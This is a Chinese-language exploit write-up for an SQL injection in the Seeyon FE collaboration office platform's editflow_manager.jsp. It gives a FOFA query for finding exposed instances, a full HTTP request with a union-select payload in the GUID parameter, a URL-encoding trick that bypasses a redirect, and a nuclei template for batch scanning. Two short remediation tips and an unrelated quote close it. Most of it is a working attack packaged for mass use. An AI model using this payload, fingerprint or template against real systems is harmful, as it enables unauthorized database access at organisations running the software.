致远互联FE协作办公平台 editflow_manager.jsp 存在SQL注入漏洞

产品简介

致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。平台旨在为企业提供数字化转型和升级的解决方案，特别是针对大中型政府和企业客户。平台的主要特点包括开放共享、多种协同应用、以及先进的技术支持。

漏洞概述

致远互联FE协作办公平台editflow_manager.jsp存在sql注入漏洞，由于GUID参数未过滤或者过滤不严格，允许攻击者利用漏洞获取数据库敏感。

指纹识别

fofa:

app="致远互联-FE"

漏洞利用

poc:

POST /sysform/003/editflow_manager.j%73p HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=B2D63DD7EF3DFF0C26C68B223E295B04
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

option=2&GUID=-1%27+union+select+%40%40version--+

PS：需使用url编码后缀名来绕过302跳转

获取数据库版本

sqlmap验证

nuclei批量验证脚本

id: seeyon-fe-editflow_manager-sql

info:
  name: 致远互联FE协作办公平台 SQL注入漏洞
  author: 3tefanie
  severity: high
  description: 远互联FE协作办公平台editflow_manager.jsp存在sql注入漏洞，由于GUID参数未过滤或者过滤不严格，允许攻击者利用漏洞获取数据库敏感。

  metadata: 
    fofa-query: app="致远互联-FE"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        POST /sysform/003/editflow_manager.j%73p HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        option=2&GUID=-1%27+union+select+@@version--+

        
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains(body,"Microsoft SQL Server")

修复建议

1.查询代码使用预编译语句
2.部署Web应用防火墙，对数据库操作进行监控

【每个结局伤感的故事，都有个温暖的开头，每年的大雪隆冬，都是从春暖花开中走来。】